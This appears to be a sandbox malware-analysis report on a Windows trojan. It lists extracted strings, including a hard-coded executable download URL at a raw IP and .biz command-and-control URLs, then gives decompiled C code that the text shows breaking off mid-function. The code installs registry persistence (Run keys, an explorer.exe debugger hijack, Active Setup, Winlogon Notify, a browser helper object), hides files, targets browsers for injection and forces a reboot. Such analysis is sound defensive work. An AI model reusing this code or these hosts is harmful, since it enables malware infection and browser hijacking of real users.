{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}, xrefs: 00403B1E, 004048C5
iexplore.exe, xrefs: 00403D28
HTTP/1.0 200, xrefs: 00403BE4
%u.%u.%u.%s, xrefs: 00403B0C
grazie.gif, xrefs: 00403CAA
isdn, xrefs: 00403AFA
RECOVER32.DLL, xrefs: 00403A34
Connections, xrefs: 00403922
ntdbg.exe, xrefs: 00403AA0
.dll, xrefs: 00403EC4, 00403F2B, 00403F41
kernel32.dll, xrefs: 00403451, 00403463
GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00403BAE
.exe, xrefs: 00403EB2, 00403EE9, 00403EFF, 00403F15
mozilla.exe, xrefs: 00403D4C
%ComSpec%, xrefs: 00403B30, 00404294
urlinj_creat, xrefs: 00403C08
g00d d0gg, xrefs: 00403CF2
http://%s/, xrefs: 00403DEE, 00403E05
IsInstalled, xrefs: 00403B78
urlinj_conn, xrefs: 00403BF6
urlinj_fork, xrefs: 00403C3E
idbg32.exe, xrefs: 00403A8E
StubPath, xrefs: 00403B8A
%02X, xrefs: 00403FB6
http://69.50.173.166/gdnOT2424.exe, xrefs: 00403CBC
SubshellState, xrefs: 00403CE0
%CommonProgramFiles%\System\, xrefs: 00403B42
ThreadingModel, xrefs: 00403DCA
CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32, xrefs: 00403DA6
rmass.exe, xrefs: 00403A22
tombul.gif, xrefs: 00403CCE
opera.exe, xrefs: 00403D70
urlinj_xfer, xrefs: 00403C1A
iphlpapi.dll, xrefs: 0040388A, 0040389C
ProxyEnable, xrefs: 00403910
\Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004038EC
Startup, xrefs: 00403D94
QlC5hT0yHn63XEm5LqJ2OxSkGj2v, xrefs: 004047F1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00403C50
DLLName, xrefs: 00403D82
Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00403BD2
http://utbidet-ugeas.biz/d/rpt?, xrefs: 00403AD6
ConnPred, xrefs: 00403C62
aset32.exe, xrefs: 00403A6A
UseExtProfile, xrefs: 00403C74
wininet.dll, xrefs: 00403934, 00403946
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 0040454A, 00404561
modem, xrefs: 00403AE8
firefox.exe, xrefs: 00403D3A
ahuy.exe, xrefs: 00403A7C
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}, xrefs: 00403DB8
seamonkey.exe, xrefs: 00403D5E
Debugger, xrefs: 00403B66
http://%s.biz/d/N?, xrefs: 00403AB2
Both, xrefs: 00403DDC
SOFTWARE\Microsoft\Active Setup\Installed Components\, xrefs: 004048D7, 004048EE, 00404900
%AppData%\, xrefs: 00403B54, 00404D60
rasapi32.dll, xrefs: 00403834, 0040384C

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: HeapProcessVersion
String ID: %02X$%AppData%\$%ComSpec%$%CommonProgramFiles%\System\$%u.%u.%u.%s$--k33p$.dll$.exe$Both$CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32$ConnPred$Connections$DLLName$Debugger$Default Flags$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$IsInstalled$Mozilla/4.0 (compatible; MSIE 6.0; Win32)$ProxyEnable$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RECOVER32.DLL$SOFTWARE\Microsoft\Active Setup\Installed Components\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$Startup$StubPath$SubshellState$ThreadingModel$UseDflProfile$UseExtProfile$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes$ahuy.exe$aset32.exe$explorer.exe$firefox.exe$g00d d0gg$grazie.gif$gymspzd.dll$http://%s.biz/d/G?$http://%s.biz/d/N?$http://%s/$http://69.50.173.166/gdnOT2424.exe$http://utbidet-ugeas.biz/d/cc$http://utbidet-ugeas.biz/d/rpt?$idbg32.exe$iexplore.exe$iphlpapi.dll$isdn$kernel32.dll$modem$mozilla.exe$museum$ntdbg.exe$opera.exe$qnd_b__-12$rasapi32.dll$rmass.exe$seamonkey.exe$tombul.gif$urlinj_conn$urlinj_creat$urlinj_creat_f$urlinj_fork$urlinj_xfer$wininet.dll$winlogon.exe$winrnt.exe${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}${38383738-3439-3838-3738-343938383738}
API String ID: 2203647613-2045427758
Opcode ID: f78267869c789c7291e1316d4ea590cffc18d8f284752ea6c091d17c6a5190b1
Instruction ID: 7ac2c5788e51c7a3e4843286e6f135765ee1a2bd270a6153adf5efe2d07321ba
Opcode Fuzzy Hash: f78267869c789c7291e1316d4ea590cffc18d8f284752ea6c091d17c6a5190b1
Instruction Fuzzy Hash: 0F027F702042416ADB309A658A857EF299CE756315F50CC3BF685FA2C1D7FCDAC08B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403FF5 Relevance: 72.0, APIs: 34, Strings: 7, Instructions: 236
registrystringsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00403FF5() {
				void* _t414;
				void* _t417;
				signed char* _t419;
				void* _t422;
				signed char* _t441;
				void* _t444;
				void* _t446;
				void* _t447;
				void* _t448;
				void* _t452;
				void* _t453;
				void* _t454;
				CHAR* _t457;
				void* _t459;
				long _t460;
				CHAR* _t461;
				void* _t463;
				long _t464;
				CHAR* _t469;
				void* _t471;
				CHAR* _t472;
				void* _t474;
				signed char* _t484;
				void* _t485;
				void* _t488;
				signed char* _t490;
				void* _t493;
				void* _t494;
				void* _t500;
				void* _t501;
				void* _t506;
				void* _t511;
				void* _t513;
				void* _t515;
				void* _t519;
				void* _t521;
				void* _t526;
				long _t530;
				int _t531;
				void* _t537;
				void* _t539;
				void* _t542;
				void* _t549;
				void* _t551;
				void* _t553;
				void* _t558;
				void* _t561;
				void* _t563;
				void* _t566;
				void* _t568;
				void* _t572;
				void* _t577;
				void* _t579;
				void* _t581;
				int _t585;
				void* _t586;
				void* _t588;
				signed char* _t589;
				signed char* _t590;
				void* _t591;
				signed char* _t592;
				signed char* _t593;
				signed char* _t594;
				signed char* _t595;
				signed char* _t596;
				void* _t597;
				signed char* _t598;
				void* _t599;
				char* _t601;
				CHAR* _t602;
				void* _t606;
				void* _t608;
				int _t611;
				void* _t625;
				int _t626;
				void* _t629;
				CHAR* _t635;
				void* _t637;
				long _t638;
				void* _t643;
				void* _t651;
				void* _t652;
				signed char _t660;
				void* _t666;
				void* _t670;
				void* _t672;
				int _t673;
				void* _t676;
				signed char _t687;
				int _t688;
				signed char* _t689;
				void* _t690;
				void* _t692;
				void* _t697;
				void* _t699;
				void* _t700;
				long* _t701;
				signed int* _t704;
				long _t714;
				int _t715;
				signed char _t725;
				void* _t728;
				void* _t730;
				int _t731;
				signed char* _t732;
				void* _t733;
				void* _t735;
				void* _t738;
				void* _t740;
				void* _t741;
				void* _t742;
				signed int* _t745;
				void* _t754;
				int _t755;
				signed char _t765;
				void* _t775;
				void* _t777;
				int _t778;
				CHAR* _t780;
				void* _t786;
				void* _t793;
				CHAR* _t798;
				void* _t799;
				void* _t801;
				void* _t803;
				void* _t809;
				void* _t811;
				void* _t813;
				void* _t816;
				signed int _t819;
				void* _t823;
				long _t824;
				int _t826;
				void* _t836;
				void* _t837;
				CHAR* _t841;
				char* _t842;
				CHAR* _t843;
				CHAR* _t844;
				CHAR* _t845;
				CHAR* _t846;
				CHAR* _t847;
				CHAR* _t848;
				CHAR* _t849;
				long* _t850;
				void** _t851;
				char* _t852;
				char* _t853;
				CHAR* _t854;
				void* _t857;
				char* _t858;
				char* _t860;
				char* _t861;
				char* _t862;
				long* _t863;
				CHAR* _t864;
				int _t865;
				CHAR* _t866;
				CHAR* _t867;
				void* _t868;
				signed int* _t870;
				char* _t871;
				void* _t872;
				CHAR* _t873;
				CHAR* _t874;
				void* _t875;
				signed int* _t877;
				char* _t878;
				CHAR* _t879;
				CHAR* _t880;
				struct _STARTUPINFOA* _t881;
				void* _t882;
				void* _t883;
				long _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				CHAR* _t888;
				signed char _t889;
				long* _t893;
				long* _t894;
				void* _t895;
				long _t897;
				long _t898;
				void* _t899;
				signed int* _t923;
				signed char* _t924;
				signed char* _t925;
				signed int* _t927;
				signed int* _t930;
				void* _t935;
				void* _t936;
				char* _t937;
				signed char* _t938;
				void* _t939;
				void* _t940;
				long _t941;
				signed int _t942;
				signed int* _t943;
				void** _t944;
				void* _t946;
				void** _t947;
				void** _t948;
				char* _t949;
				CHAR* _t950;
				signed char* _t951;
				long* _t952;
				signed int* _t953;
				void* _t954;
				void* _t955;
				char* _t956;
				signed int* _t957;
				void* _t958;
				char* _t959;
				signed int* _t960;
				CHAR* _t962;
				long _t963;
				void* _t964;
				signed int* _t965;
				long _t966;
				struct _FILETIME* _t967;
				void* _t968;
				void* _t969;
				long* _t970;

				L0:
				while(1) {
					L0:
					if( *((intOrPtr*)(_t969 + 0x34)) > 0x11) {
						__eflags =  *(_t969 + 0x1c);
						if( *(_t969 + 0x1c) != 0) {
							goto L61;
						}
						E0040265F(0);
						goto L40;
					} else {
						L3:
						_t809 = CreateToolhelp32Snapshot(2, 0);
						_t968 = _t809;
						if(_t809 == 0) {
							L29:
							__eflags =  *((intOrPtr*)(_t969 + 0x34)) - 0xb;
							if( *((intOrPtr*)(_t969 + 0x34)) <= 0xb) {
								_t811 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t969 + 0x98);
								__eflags = _t811;
								if(_t811 == 0) {
									 *(_t969 + 0x30) = 0;
									_t813 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t969 + 0x98, 0);
									__eflags = _t813;
									if(_t813 == 0) {
										 *(_t969 + 0x9c) = 0x12;
										_t816 = RegQueryValueExA( *(_t969 + 0xac), "Default Flags", 0, 0, 0x412190, _t969 + 0x9c);
										__eflags = _t816;
										if(_t816 == 0) {
											_t819 = RegSetValueExA( *(_t969 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
											__eflags = _t819;
											_t42 = _t819 == 0;
											__eflags = _t42;
											 *(_t969 + 0x30) = (_t819 & 0xffffff00 | _t42) & 0x000000ff;
										}
										RegCloseKey( *(_t969 + 0x94));
										__eflags =  *(_t969 + 0x30);
										if( *(_t969 + 0x30) == 0) {
											RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
										}
									}
									RegCloseKey( *(_t969 + 0x98));
								}
							}
							do {
								L40:
								CloseHandle( *(_t969 + 0x10)); // executed
								do {
									 *((intOrPtr*)(_t969 + 0x34)) =  *((intOrPtr*)(_t969 + 0x34)) + 1;
									_push( *((intOrPtr*)(_t969 + 0x34)));
									wsprintfA(0x408816, "%02X");
									_t775 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
									 *(_t969 + 0x1c) = _t775;
									_t969 = _t969 + 0xc;
								} while (_t775 == 0);
								if(GetLastError() != 0xb7) {
									goto L39;
								} else {
									goto L0;
								}
								goto L3;
								L39:
								__eflags =  *((intOrPtr*)(_t969 + 0x34)) - 0x11;
							} while ( *((intOrPtr*)(_t969 + 0x34)) <= 0x11);
							_t879 = _t969 + 0x134c;
							_t777 = ExpandEnvironmentStringsA("%ComSpec%", _t879, 0x104);
							__eflags = _t777;
							if(_t777 != 0) {
								_t803 = CreateFileA(_t879, 0x80000000, 1, 0, 3, 0, 0); // executed
								 *(_t969 + 0xa0) = _t803;
								__eflags = _t803 - 0xffffffff;
								_t935 = _t803;
								if(_t803 != 0xffffffff) {
									GetFileTime(_t935, _t969 + 0x84, _t969 + 0x88, _t969 + 0x8c);
									CloseHandle( *(_t969 + 0xa0));
									 *(_t969 + 0xc) = 1;
								}
							}
							__eflags =  *(_t969 + 0x1c);
							if( *(_t969 + 0x1c) != 0) {
								L63:
								_t414 = CreateFileA(_t969 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
								 *(_t969 + 0xa0) = _t414;
								__eflags = _t414;
								if(_t414 == 0) {
									L66:
									 *(_t969 + 0x14) = 0;
									_t966 = 0;
									__eflags = 0;
									L67:
									_t417 = CreateThread(0, 0x1000, E00401038, _t969 + 0x1570, 0, _t969 + 0x9c); // executed
									CloseHandle(_t417);
									_t419 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
									while(1) {
										__eflags = _t419 - 0x408776;
										if(_t419 >= 0x408776) {
											break;
										}
										 *_t419 =  *_t419 ^ 0x000000d4;
										_t419 =  &(_t419[1]);
									}
									while(1) {
										__eflags = 0x407b20 - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
										if(0x407b20 >= "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe") {
											break;
										}
										 *0x407b20 =  *0x407b20 ^ 0x0000004d;
										__eflags =  *0x407b20;
										 *(_t966 + 0x40) =  *(_t966 + 0x40) ^ _t889;
									}
									__eflags =  *0x412100 - 2;
									if( *0x412100 != 2) {
										L99:
										 *(_t969 + 0x78) = 0x10;
										_t841 = _t969 + 0x1ec;
										_t422 = GetComputerNameA(_t841, _t969 + 0x78); // executed
										__eflags = _t422;
										if(_t422 == 0) {
											L101:
											_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
											_push(_t969 + 0x1bc);
											L00405E20();
											L105:
											wsprintfA("{38383738-3439-3838-3738-343938383738}", "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t969 + 0x1f4)),  *((char*)(_t969 + 0x1f1)),  *((char*)(_t969 + 0x1ee)),  *((char*)(_t969 + 0x1eb)),  *((char*)(_t969 + 0x1e8)),  *((char*)(_t969 + 0x1e5)),  *((char*)(_t969 + 0x1e2)),  *((char*)(_t969 + 0x1df)),  *((char*)(_t969 + 0x1dc)),  *((char*)(_t969 + 0x1d9)),  *((char*)(_t969 + 0x1d6)),  *((char*)(_t969 + 0x1d3)),  *((char*)(_t969 + 0x1d0)),  *((char*)(_t969 + 0x1cd)),  *((char*)(_t969 + 0x1ca)),  *((char*)(_t969 + 0x1c7)));
											_t970 = _t969 + 0x48;
											_t441 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
											while(1) {
												__eflags = _t441 - 0x407ad5;
												if(_t441 >= 0x407ad5) {
													break;
												}
												 *_t441 =  *_t441 ^ 0x000000d4;
												_t441 =  &(_t441[1]);
											}
											while(1) {
												__eflags = 0x4072a0 - "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
												if(0x4072a0 >= "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\") {
													break;
												}
												 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
												__eflags =  *0x4072a0;
												 *(_t966 + 0x40) =  *(_t966 + 0x40) ^ _t889;
											}
											_push("{38383738-3439-3838-3738-343938383738}");
											_push("SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\");
											_t842 =  &(_t970[0x410]);
											_push(_t842);
											L00405E20();
											_push(0x4072a0);
											L00405E30();
											_t444 = RegCreateKeyA(0x80000002, _t842,  &(_t970[0x26])); // executed
											__eflags = _t444;
											if(_t444 != 0) {
												L136:
												_t446 = E004030DE( &(_t970[0x1ee]));
												_t970[0x26] = _t446;
												__eflags = _t446;
												if(_t446 == 0) {
													L156:
													_t447 = E004010B2();
													__eflags = _t447;
													_t897 = _t447;
													if(_t447 == 0) {
														_t897 = 0x42;
													}
													_t970[0x1ee] = _t897;
													_t448 = E004010B2();
													__eflags = _t448;
													_t898 = _t448;
													if(_t448 == 0) {
														_t898 = 0x4d;
													}
													_t970[0x162] = _t898;
													_push( *0x4120b0);
													_push( &(_t970[0x163]));
													L00405E20();
													_push( &(_t970[0x55a]));
													_push( &(_t970[0x1ac]));
													L00405E20();
													_t943 = _t970[5];
													_t452 = _t943 + _t966;
													while(1) {
														__eflags = _t943 - _t452;
														if(_t943 >= _t452) {
															break;
														}
														 *_t943 =  *_t943 ^ _t970[0x162] & 0x000000ff;
														_t943 =  &(_t943[0]);
														_t452 = _t970[5] + _t966;
													}
													_t843 =  &(_t970[0x517]);
													_t453 = ExpandEnvironmentStringsA("%AppData%\\", _t843, 0x104);
													__eflags = _t453;
													if(_t453 == 0) {
														L167:
														_t844 =  &(_t970[0x516]);
														_t454 = GetTempPathA(0x104, _t844);
														__eflags = _t454;
														if(_t454 == 0) {
															L175:
															E00401029(_t970[5]);
															_t845 =  &(_t970[0x387]);
															_t457 = GetSystemDirectoryA(_t845, 0x104);
															_push(0x80);
															_push( *0x4120c0);
															_push(0x41103e);
															_push(_t845);
															L00405E30();
															L00405E30();
															SetFileAttributesA(_t457, _t457); // executed
															_t459 = CreateFileA(_t845, 0x40000000, 0, 0, 2, 0x80, 0); // executed
															_t970[0x28] = _t459;
															__eflags = _t459;
															if(_t459 == 0) {
																L182:
																_t460 = GetLastError();
																__eflags = _t460 - 0x20;
																if(_t460 != 0x20) {
																	_t846 =  &(_t970[0x387]);
																	_t461 = ExpandEnvironmentStringsA("%AppData%\\", _t846, 0x104);
																	_push(0x80);
																	_push( *0x4120c0);
																	L00405E30();
																	SetFileAttributesA(_t461, _t846);
																	_t463 = CreateFileA(_t846, 0x40000000, 0, 0, 2, 0x80, 0);
																	_t970[0x28] = _t463;
																	__eflags = _t463;
																	if(_t463 == 0) {
																		L186:
																		_t464 = GetLastError();
																		__eflags = _t464 - 0x20;
																		if(_t464 == 0x20) {
																			goto L183;
																		}
																		_t635 = GetTempPathA(0x104, _t846);
																		_push(0x80);
																		_push( *0x4120c0);
																		L00405E30();
																		SetFileAttributesA(_t635, _t846);
																		_t637 = CreateFileA(_t846, 0x40000000, 0, 0, 2, 0x80, 0);
																		_t970[0x28] = _t637;
																		__eflags = _t637;
																		if(_t637 == 0) {
																			L189:
																			_t638 = GetLastError();
																			__eflags = _t638 - 0x20;
																			if(_t638 == 0x20) {
																				goto L183;
																			}
																			L192:
																			_t847 =  &(_t970[0x343]);
																			_t469 = ExpandEnvironmentStringsA("%AppData%\\", _t847, 0x104);
																			_push(0x80);
																			_push( *0x4120d0);
																			L00405E30();
																			SetFileAttributesA(_t469, _t847); // executed
																			_t471 = CreateFileA(_t847, 0x40000000, 0, 0, 2, 0x80, 0); // executed
																			_t970[0x28] = _t471;
																			__eflags = _t471;
																			_t899 = _t471;
																			if(_t471 == 0) {
																				L194:
																				_t848 =  &(_t970[0x342]);
																				_t472 = GetTempPathA(0x104, _t848);
																				_push(0x80);
																				_push( *0x4120d0);
																				L00405E30();
																				SetFileAttributesA(_t472, _t848);
																				_t474 = CreateFileA(_t848, 0x40000000, 0, 0, 2, 0x80, 0);
																				_t970[0x28] = _t474;
																				__eflags = _t474;
																				_t899 = _t474;
																				if(_t474 == 0) {
																					L197:
																					_t970[0x342] = 0;
																					L198:
																					__eflags = _t970[0x342];
																					if(_t970[0x342] != 0) {
																						CreateFileA( &(_t970[0x348]), 0x80000000, 1, 0, 3, 0, 0); // executed
																					}
																					_t849 =  &(_t970[0x2b]);
																					GetSystemDirectoryA(_t849, 0x104);
																					_push(0x41103e);
																					_push(_t849);
																					L00405E30();
																					E004012C2(_t849);
																					ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t849, 0x104);
																					E004012C2(_t849);
																					ExpandEnvironmentStringsA("%AppData%\\", _t849, 0x104);
																					E004012C2(_t849);
																					_t484 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
																					while(1) {
																						__eflags = _t484 - 0x40724d;
																						if(_t484 >= 0x40724d) {
																							break;
																						}
																						 *_t484 =  *_t484 ^ 0x000000d4;
																						_t484 =  &(_t484[1]);
																					}
																					_t485 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t970[0x26])); // executed
																					__eflags = _t485;
																					if(_t485 == 0) {
																						L205:
																						__eflags = _t970[0xb];
																						if(_t970[0xb] == 0) {
																							_t862 =  &(_t970[0x55a]);
																							_t625 = E00401251(_t970[0x26]);
																							_push(_t862);
																							L00405E40();
																							_t626 = _t625 + 1;
																							__eflags = _t626;
																							RegSetValueExA(_t970[0x2b],  *0x4120b0, 0, 1, _t862, _t626);
																						}
																						RegDeleteValueA(_t970[0x27], "winrnt.exe"); // executed
																						RegCloseKey(_t970[0x26]); // executed
																						L208:
																						__eflags =  *0x412100 - 2;
																						if( *0x412100 != 2) {
																							L248:
																							_t488 = CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t970[0x27])); // executed
																							CloseHandle(_t488);
																							_t490 = "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}";
																							while(1) {
																								__eflags = _t490 - 0x407060;
																								if(_t490 >= 0x407060) {
																									break;
																								}
																								 *_t490 =  *_t490 ^ 0x000000d4;
																								_t490 =  &(_t490[1]);
																							}
																							_t970[0xc] = 0;
																							while(1) {
																								E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
																								__eflags = _t970[0xc] - 9;
																								if(_t970[0xc] <= 9) {
																									goto L287;
																								}
																								_t970[0x16] = 0;
																								_t970[0x17] = 0;
																								_t549 = E004025C3();
																								__eflags = _t549;
																								if(_t549 != 0) {
																									L284:
																									 *_t970 = 0;
																									L288:
																									_t970[0xd] = 0x3b;
																									do {
																										__eflags = _t970[0x342];
																										if(_t970[0x342] != 0) {
																											_push(0);
																											_push("opera.exe");
																											_push("seamonkey.exe");
																											_push("mozilla.exe");
																											_push("firefox.exe");
																											_push("iexplore.exe");
																											_push("explorer.exe");
																											E0040318D( &(_t970[0x349]));
																											_t970 =  &(_t970[8]);
																										}
																										__eflags = _t970[0xa];
																										if(_t970[0xa] != 0) {
																											_t853 =  &(_t970[0x3cb]);
																											SetFileAttributesA(_t853, 0x21); // executed
																											_t526 = RegCreateKeyA(0x80000002,  &(_t970[0x40f]),  &(_t970[0x26])); // executed
																											__eflags = _t526;
																											if(_t526 == 0) {
																												E00401251(_t970[0x26]);
																												_t970[0x27] = 1;
																												_t530 = RegSetValueExA(_t970[0x2b], "IsInstalled", 0, 4,  &(_t970[0x28]), 4); // executed
																												_push(_t853);
																												L00405E40();
																												_t531 = _t530 + 1;
																												__eflags = _t531;
																												RegSetValueExA(_t970[0x2b], "StubPath", 0, 1, _t853, _t531); // executed
																												RegCloseKey(_t970[0x26]); // executed
																											}
																										}
																										__eflags = _t970[0xb];
																										_t944 =  &(_t970[0x26]);
																										if(_t970[0xb] == 0) {
																											_t493 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t944);
																											__eflags = _t493;
																											if(_t493 == 0) {
																												L299:
																												_t850 =  &(_t970[0x55a]);
																												_push(_t850);
																												L00405E40();
																												_t494 = _t493 + 1;
																												__eflags = _t494;
																												_push(_t494);
																												_push(_t850);
																												_push(1);
																												_push(0);
																												_push( *0x4120b0);
																												goto L300;
																											}
																											_t493 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t944);
																											__eflags = _t493;
																											if(_t493 != 0) {
																												goto L301;
																											}
																											goto L299;
																										} else {
																											_t854 =  &(_t970[0x48f]);
																											SetFileAttributesA(_t854, 0x21); // executed
																											_t500 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t944); // executed
																											__eflags = _t500;
																											if(_t500 != 0) {
																												L301:
																												__eflags = _t970[9];
																												if(_t970[9] == 0) {
																													goto L311;
																												}
																												_t851 =  &(_t970[0x27]);
																												_t501 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t851, 0); // executed
																												__eflags = _t501;
																												if(_t501 == 0) {
																													L304:
																													RegSetValueExA(_t970[0x2b], "SubshellState", 0, 3,  &(_t970[0x1ef]), 0x22a); // executed
																													RegCloseKey(_t970[0x26]); // executed
																													L305:
																													_t852 =  &(_t970[0x387]);
																													SetFileAttributesA(_t852, 0x21); // executed
																													__eflags =  *0x412100 - 2;
																													_t947 =  &(_t970[0x26]);
																													if( *0x412100 != 2) {
																														_t506 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t947);
																														__eflags = _t506;
																														if(_t506 != 0) {
																															goto L311;
																														}
																														_push(_t852);
																														L00405E40();
																														RegSetValueExA(_t970[0x2b], 0, 0, 1, _t852, _t506 + 1);
																														RegSetValueExA(_t970[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																														RegCloseKey(_t970[0x26]);
																														_t511 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t947);
																														__eflags = _t511;
																														if(_t511 != 0) {
																															goto L311;
																														}
																														L310:
																														RegCloseKey(_t970[0x26]); // executed
																														goto L311;
																													}
																													_t513 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t947); // executed
																													__eflags = _t513;
																													if(_t513 != 0) {
																														goto L311;
																													}
																													_t515 = E00401251(_t970[0x26]);
																													_push(_t852);
																													L00405E40();
																													RegSetValueExA(_t970[0x2b], "DLLName", 0, 1, _t852, _t515 + 1); // executed
																													RegSetValueExA(_t970[0x2b], "Startup", 0, 1, "Startup", 8); // executed
																													goto L310;
																												}
																												_t519 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t851, 0);
																												__eflags = _t519;
																												if(_t519 != 0) {
																													goto L305;
																												}
																												goto L304;
																											}
																											_t521 = E00401251(_t970[0x26]);
																											_push(_t854);
																											L00405E40();
																											_push(_t521 + 1);
																											_push(_t854);
																											_push(1);
																											_push(0);
																											_push("Debugger");
																											L300:
																											RegSetValueExA(_t970[0x2b], ??, ??, ??, ??, ??); // executed
																											RegCloseKey(_t970[0x26]); // executed
																											goto L301;
																										}
																										L311:
																										SetFileAttributesA( &(_t970[0x55b]), 0x21); // executed
																										Sleep(0x3e8); // executed
																										_t400 =  &(_t970[0xd]);
																										 *_t400 = _t970[0xd] - 1;
																										__eflags =  *_t400;
																									} while ( *_t400 >= 0);
																									_t537 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t970[0x12]), 0);
																									__eflags = _t537;
																									if(_t537 == 0) {
																										_t970[0x10] = 4;
																										_t858 =  &(_t970[0x10]);
																										_t539 = RegQueryValueExA(_t970[0x16], "g00d d0gg", 0, 0, _t858,  &(_t970[0x10]));
																										__eflags = _t539;
																										if(_t539 == 0) {
																											_t542 = _t970[0xf] - 1;
																											__eflags = _t542;
																											_t970[0xf] = _t542;
																											if(_t542 == 0) {
																												RegDeleteValueA(_t970[0x12], "g00d d0gg");
																												Sleep(0x1388);
																												__eflags =  *0x412100 - 2;
																												if( *0x412100 != 2) {
																													ExitWindowsEx(6, 0);
																												} else {
